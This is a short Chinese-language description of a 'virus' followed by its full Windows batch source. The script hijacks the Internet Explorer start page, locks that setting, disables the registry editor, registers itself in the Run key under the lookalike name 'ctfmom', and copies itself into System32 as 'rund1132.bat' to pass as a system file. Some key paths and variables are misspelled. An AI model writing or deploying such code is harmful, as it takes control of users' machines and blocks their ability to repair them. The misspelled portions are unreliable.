该病毒修改IE主页为https://www.baidu.com,并将其加入到注册表项,然后禁用注册表编辑器,同时将病毒程序加入开机启动项,最后将病毒样本复制到了系统目录system32下
@echo off
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "https://www.baidu.com" /f
reg add "HKCU\Software\Polices\Microsoft\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "&winddir%\System32\rund1132.bat" /f
copy %0 %windir%\System32\rund1132.bat